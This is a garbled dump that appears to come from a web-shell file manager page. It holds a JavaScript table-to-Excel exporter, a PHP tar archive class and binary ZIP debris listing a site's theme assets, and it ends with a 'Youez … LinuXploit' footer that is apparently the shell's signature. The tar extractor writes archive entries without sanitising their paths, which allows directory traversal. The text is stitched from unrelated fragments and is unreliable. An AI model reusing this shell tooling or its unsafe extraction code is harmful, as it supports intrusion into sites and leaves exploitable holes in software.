    template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>',
    format = function(s, c) {
            return s.replace(/{(\w+)}/g, function(m, p) {
                return c[p];
            })
        }
    return function(table, name) {
        if (!table.nodeType) table = document.getElementById(table)
        var ctx = {
            worksheet: name || 'Worksheet',
            table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1")
        }
		t = new Date();
		filename = 'fm_' + t.toISOString() + '.xls'
		download_xls(filename, base64_encode(format(template, ctx)))
    }
})();

var table2Excel = function () {

    var ua = window.navigator.userAgent;
    var msie = ua.indexOf("MSIE ");

	this.CreateExcelSheet = 
		function(el, name){
			if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer

				var x = document.getElementById(el).rows;

				var xls = new ActiveXObject("Excel.Application");

				xls.visible = true;
				xls.Workbooks.Add
				for (i = 0; i < x.length; i++) {
					var y = x[i].cells;

					for (j = 0; j < y.length; j++) {
						xls.Cells(i + 1, j + 1).Value = y[j].innerText;
					}
				}
				xls.Visible = true;
				xls.UserControl = true;
				return xls;
			} else {
				tableToExcelData(el, name);
			}
		}
}
</script>
</body>
</html>

<?php
//Ported from ReloadCMS project http://reloadcms.com
class archiveTar {
	var $archive_name = '';
	var $tmp_file = 0;
	var $file_pos = 0;
	var $isGzipped = true;
	var $errors = array();
	var $files = array();
	
	function __construct(){
		if (!isset($this->errors)) $this->errors = array();
	}
	
	function createArchive($file_list){
		$result = false;
		if (file_exists($this->archive_name) && is_file($this->archive_name)) 	$newArchive = false;
		else $newArchive = true;
		if ($newArchive){
			if (!$this->openWrite()) return false;
		} else {
			if (filesize($this->archive_name) == 0)	return $this->openWrite();
			if ($this->isGzipped) {
				$this->closeTmpFile();
				if (!rename($this->archive_name, $this->archive_name.'.tmp')){
					$this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp';
					return false;
				}
				$tmpArchive = gzopen($this->archive_name.'.tmp', 'rb');
				if (!$tmpArchive){
					$this->errors[] = $this->archive_name.'.tmp '.__('is not readable');
					rename($this->archive_name.'.tmp', $this->archive_name);
					return false;
				}
				if (!$this->openWrite()){
					rename($this->archive_name.'.tmp', $this->archive_name);
					return false;
				}
				$buffer = gzread($tmpArchive, 512);
				if (!gzeof($tmpArchive)){
					do {
						$binaryData = pack('a512', $buffer);
						$this->writeBlock($binaryData);
						$buffer = gzread($tmpArchive, 512);
					}
					while (!gzeof($tmpArchive));
				}
				gzclose($tmpArchive);
				unlink($this->archive_name.'.tmp');
			} else {
				$this->tmp_file = fopen($this->archive_name, 'r+b');
				if (!$this->tmp_file)	return false;
			}
		}
		if (isset($file_list) && is_array($file_list)) {
		if (count($file_list)>0)
			$result = $this->packFileArray($file_list);
		} else $this->errors[] = __('No file').__(' to ').__('Archive');
		if (($result)&&(is_resource($this->tmp_file))){
			$binaryData = pack('a512', '');
			$this->writeBlock($binaryData);
		}
		$this->closeTmpFile();
		if ($newArchive && !$result){
		$this->closeTmpFile();
		unlink($this->archive_name);
		}
		return $result;
	}

	function restoreArchive($path){
		$fileName = $this->archive_name;
		if (!$this->isGzipped){
			if (file_exists($fileName)){
				if ($fp = fopen($fileName, 'rb')){
					$data = fread($fp, 2);
					fclose($fp);
					if ($data == '\37\213'){
						$this->isGzipped = true;
					}
				}
			}
			elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true;
		} 
		$result = true;
		if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb');
		else $this->tmp_file = fopen($fileName, 'rb');
		if (!$this->tmp_file){
			$this->errors[] = $fileName.' '.__('is not readable');
			return false;
		}
		$result = $this->unpackFileArray($path);
			$this->closeTmpFile();
		return $result;
	}

	function showErrors	($message = '') {
		$Errors = $this->errors;
		if(count($Errors)>0) {
		if (!empty($message)) $message = ' ('.$message.')';
			$message = __('Error occurred').$message.': <br/>';
			foreach ($Errors as $value)
				$message .= $value.'<br/>';
			return $message;	
		} else return '';
		
	}
	
	function packFileArray($file_array){
		$result = true;
		if (!$this->tmp_file){
			$this->errors[] = __('Invalid file descriptor');
			return false;
		}
		if (!is_array($file_array) || count($file_array)<=0)
          return true;
		for ($i = 0; $i<count($file_array); $i++){
			$filename = $file_array[$i];
			if ($filename == $this->archive_name)
				continue;
			if (strlen($filename)<=0)
				continue;
			if (!file_exists($filename)){
				$this->errors[] = __('No file').' '.$filename;
				continue;
			}
			if (!$this->tmp_file){
			$this->errors[] = __('Invalid file descriptor');
			return false;
			}
		if (strlen($filename)<=0){
			$this->errors[] = __('Filename').' '.__('is incorrect');;
			return false;
		}
		$filename = str_replace('\\', '/', $filename);
		$keep_filename = $this->makeGoodPath($filename);
		if (is_file($filename)){
			if (($file = fopen($filename, 'rb')) == 0){
				$this->errors[] = __('Mode ').__('is incorrect');
			}
				if(($this->file_pos == 0)){
					if(!$this->writeHeader($filename, $keep_filename))
						return false;
				}
				while (($buffer = fread($file, 512)) != ''){
					$binaryData = pack('a512', $buffer);
					$this->writeBlock($binaryData);
				}
			fclose($file);
		}	else $this->writeHeader($filename, $keep_filename);
			if (@is_dir($filename)){
				if (!($handle = opendir($filename))){
					$this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable');
					continue;
				}
				while (false !== ($dir = readdir($handle))){
					if ($dir!='.' && $dir!='..'){
						$file_array_tmp = array();
						if ($filename != '.')
							$file_array_tmp[] = $filename.'/'.$dir;
						else
							$file_array_tmp[] = $dir;

						$result = $this->packFileArray($file_array_tmp);
					}
				}
				unset($file_array_tmp);
				unset($dir);
				unset($handle);
			}
		}
		return $result;
	}

	function unpackFileArray($path){ 
		$path = str_replace('\\', '/', $path);
		if ($path == ''	|| (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':')))	$path = './'.$path;
		clearstatcache();
		while (strlen($binaryData = $this->readBlock()) != 0){
			if (!$this->readHeader($binaryData, $header)) return false;
			if ($header['filename'] == '') continue;
			if ($header['typeflag'] == 'L'){			//reading long header
				$filename = '';
				$decr = floor($header['size']/512);
				for ($i = 0; $i < $decr; $i++){
					$content = $this->readBlock();
					$filename .= $content;
				}
				if (($laspiece = $header['size'] % 512) != 0){
					$content = $this->readBlock();
					$filename .= substr($content, 0, $laspiece);
				}
				$binaryData = $this->readBlock();
				if (!$this->readHeader($binaryData, $header)) return false;
				else $header['filename'] = $filename;
				return true;
			}
			if (($path != './') && ($path != '/')){
				while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1);
				if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename'];
				else $header['filename'] = $path.'/'.$header['filename'];
			}
			
			if (file_exists($header['filename'])){
				if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){
					$this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder');
					return false;
				}
				if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){
					$this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists');
					return false;
				}
				if (!is_writeable($header['filename'])){
					$this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists');
					return false;
				}
			} elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){
				$this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename'];
				return false;
			}

			if ($header['typeflag'] == '5'){
				if (!file_exists($header['filename']))		{
					if (!mkdir($header['filename'], 0777))	{
						
						$this->errors[] = __('Cannot create directory').' '.$header['filename'];
						return false;
					} 
				}
			} else {
				if (($destination = fopen($header['filename'], 'wb')) == 0) {
					$this->errors[] = __('Cannot write to file').' '.$header['filename'];
					return false;
				} else {
					$decr = floor($header['size']/512);
					for ($i = 0; $i < $decr; $i++) {
						$content = $this->readBlock();
						fwrite($destination, $content, 512);
					}
					if (($header['size'] % 512) != 0) {
						$content = $this->readBlock();
						fwrite($destination, $content, ($header['size'] % 512));
					}
					fclose($destination);
					touch($header['filename'], $header['time']);
				}
				clearstatcache();
				if (filesize($header['filename']) != $header['size']) {
					$this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect');
					return false;
				}
			}
			if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = '';
			if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/';
			$this->dirs[] = $file_dir;
			$this->files[] = $header['filename'];
	
		}
		return true;
	}

	function dirCheck($dir){
		$parent_dir = dirname($dir);

		if ((@is_dir($dir)) or ($dir == ''))
			return true;

		if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir)))
			return false;

		if (!mkdir($dir, 0777)){
			$this->errors[] = __('Cannot create directory').' '.$dir;
			return false;
		}
		return true;
	}

	function readHeader($binaryData, &$header){
		if (strlen($binaryData)==0){
			$header['filename'] = '';
			return true;
		}

		if (strlen($binaryData) != 512){
			$header['filename'] = '';
			$this->__('Invalid block size').': '.strlen($binaryData);
			return false;
		}

		$checksum = 0;
		for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1));
		for ($i = 148; $i < 156; $i++) $checksum += ord(' ');
		for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1));

		$unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData);

		$header['checksum'] = OctDec(trim($unpack_data['checksum']));
		if ($header['checksum'] != $checksum){
			$header['filename'] = '';
			if (($checksum == 256) && ($header['checksum'] == 0)) 	return true;
			$this->errors[] = __('Error checksum for file ').$unpack_data['filename'];
			return false;
		}

		if (($header['typeflag'] = $unpack_data['typeflag']) == '5')	$header['size'] = 0;
		$header['filename'] = trim($unpack_data['filename']);
		$header['mode'] = OctDec(trim($unpack_data['mode']));
		$header['user_id'] = OctDec(trim($unpack_data['user_id']));
		$header['group_id'] = OctDec(trim($unpack_data['group_id']));
		$header['size'] = OctDec(trim($unpack_data['size']));
		$header['time'] = OctDec(trim($unpack_data['time']));
		return true;
	}

	function writeHeader($filename, $keep_filename){
		$packF = 'a100a8a8a8a12A12';
		$packL = 'a1a100a6a2a32a32a8a8a155a12';
		if (strlen($keep_filename)<=0) $keep_filename = $filename;
		$filename_ready = $this->makeGoodPath($keep_filename);

		if (strlen($filename_ready) > 99){							//write long header
		$dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0);
		$dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', '');

        //  Calculate the checksum
		$checksum = 0;
        //  First part of the header
		for ($i = 0; $i < 148; $i++)
			$checksum += ord(substr($dataFirst, $i, 1));
        //  Ignore the checksum value and replace it by ' ' (space)
		for ($i = 148; $i < 156; $i++)
			$checksum += ord(' ');
        //  Last part of the header
		for ($i = 156, $j=0; $i < 512; $i++, $j++)
			$checksum += ord(substr($dataLast, $j, 1));
        //  Write the first 148 bytes of the header in the archive
		$this->writeBlock($dataFirst, 148);
        //  Write the calculated checksum
		$checksum = sprintf('%6s ', DecOct($checksum));
		$binaryData = pack('a8', $checksum);
		$this->writeBlock($binaryData, 8);
        //  Write the last 356 bytes of the header in the archive
		$this->writeBlock($dataLast, 356);

		$tmp_filename = $this->makeGoodPath($filename_ready);

		$i = 0;
			while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){
				$binaryData = pack('a512', $buffer);
				$this->writeBlock($binaryData);
			}
		return true;
		}
		$file_info = stat($filename);
		if (@is_dir($filename)){
			$typeflag = '5';
			$size = sprintf('%11s ', DecOct(0));
		} else {
			$typeflag = '';
			clearstatcache();
			$size = sprintf('%11s ', DecOct(filesize($filename)));
		}
		$dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename))));
		$dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', '');
		$checksum = 0;
		for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1));
		for ($i = 148; $i < 156; $i++) $checksum += ord(' ');
		for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1));
		$this->writeBlock($dataFirst, 148);
		$checksum = sprintf('%6s ', DecOct($checksum));
		$binaryData = pack('a8', $checksum);
		$this->writeBlock($binaryData, 8);
		$this->writeBlock($dataLast, 356);
		return true;
	}

	function openWrite(){
		if ($this->isGzipped)
			$this->tmp_file = gzopen($this->archive_name, 'wb9f');
		else
			$this->tmp_file = fopen($this->archive_name, 'wb');

		if (!($this->tmp_file)){
			$this->errors[] = __('Cannot write to file').' '.$this->archive_name;
			return false;
		}
		return true;
	}

	function readBlock(){
		if (is_resource($this->tmp_file)){
			if ($this->isGzipped)
				$block = gzread($this->tmp_file, 512);
			else
				$block = fread($this->tmp_file, 512);
		} else	$block = '';

		return $block;
	}

	function writeBlock($data, $length = 0){
		if (is_resource($this->tmp_file)){
		
			if ($length === 0){
				if ($this->isGzipped)
					gzputs($this->tmp_file, $data);
				else
					fputs($this->tmp_file, $data);
			} else {
				if ($this->isGzipped)
					gzputs($this->tmp_file, $data, $length);
				else
					fputs($this->tmp_file, $data, $length);
			}
		}
	}

	function closeTmpFile(){
		if (is_resource($this->tmp_file)){
			if ($this->isGzipped)
				gzclose($this->tmp_file);
			else
				fclose($this->tmp_file);

			$this->tmp_file = 0;
		}
	}

	function makeGoodPath($path){
		if (strlen($path)>0){
			$path = str_replace('\\', '/', $path);
			$partPath = explode('/', $path);
			$els = count($partPath)-1;
			for ($i = $els; $i>=0; $i--){
				if ($partPath[$i] == '.'){
                    //  Ignore this directory
                } elseif ($partPath[$i] == '..'){
                    $i--;
                }
				elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){
                }	else
					$result = $partPath[$i].($i!=$els ? '/'.$result : '');
			}
		} else $result = '';
		
		return $result;
	}
}
?>PK!�׸þ/�/animate-css/animate.cssnu&1i�PK!+hL��0bootstrap/css/bootstrap.cssnu&1i�PK!'�^�����8�bootstrap/js/bootstrap.min.jsnu&1i�PK!��(�J�J]�bootstrap/js/popper.min.jsnu&1i�PK!|-Ϛ55�bootstrap/js/bootstrap.jsnu&1i�PK!'%1��$�$counterup/jquery.easing.1.3.jsnu&1i�PK!�!�� � �=counterup/wow.min.jsnu&1i�PK!�ll _counterup/jquery.waypoints.jsnu&1i�PK![i++!�~counterup/jquery.counterup.min.jsnu&1i�PK!L��0h0hU�icofont/icofont.min.cssnu&1i�PK!ٍ��w�w���icofont/icofont.cssnu&1i�PK!�dQ55��
icofont/fonts/icofont.woff2nu&1i�PK!H�,&������icofont/fonts/icofont.ttfnu&1i�PK!�i���	��	�"icofont/fonts/icofont.woffnu&1i�PK!y���$�$�,icofont/fonts/icofont.svgnu&1i�PK!z#��1�Picofont/fonts/icofont.eotnu&1i�PK!�M>�66�Xaicofont/demo.htmlnu&1i�PK!G��JNJNێfjquery/jquery.min.jsnu&1i�PK!6���
�
i�gfontawesome/css/all.cssnu&1i�PK!|�t�t�%C�hfontawesome/webfonts/fa-solid-900.ttfnu&1i�PK!�r�555)�kfontawesome/webfonts/fa-regular-400.woff2nu&1i�PK!3s'l"l"'}�kfontawesome/webfonts/fa-solid-900.woff2nu&1i�PK!�^�T�T�'@mfontawesome/webfonts/fa-regular-400.eotnu&1i�PK!91���3�3'�mfontawesome/webfonts/fa-regular-400.svgnu&1i�PK!w��vX�X�&�ofontawesome/webfonts/fa-brands-400.ttfnu&1i�PK!�X˖TJTJ'ǻqfontawesome/webfonts/fa-brands-400.woffnu&1i�PK!w��M��(rsfontawesome/webfonts/fa-brands-400.woff2nu&1i�PK!��0�s�s%z tfontawesome/webfonts/fa-solid-900.svgnu&1i�PK!������%u��fontawesome/webfonts/fa-solid-900.eotnu&1i�PK!�b=����&Zm�fontawesome/webfonts/fa-brands-400.eotnu&1i�PK!\��:�
�
&8W�fontawesome/webfonts/fa-brands-400.svgnu&1i�PK!{�,�,�'2i�fontawesome/webfonts/fa-regular-400.ttfnu&1i�PK!J�h�A�A(��fontawesome/webfonts/fa-regular-400.woffnu&1i�PK!ZFNP�w�w&�0�fontawesome/webfonts/fa-solid-900.woffnu&1i�PK!�j�[&[&��google-map/gmap3.min.jsnu&1i�PK!�?�

�ϑgoogle-map/map.jsnu&1i�PK!8�����ڑform/contact.jsnu&1i�PK!��m�A�A,ߑfile.phpnu�[���PK&&�
D!�

Youez - 2016 - github.com/yon3zu
LinuXploit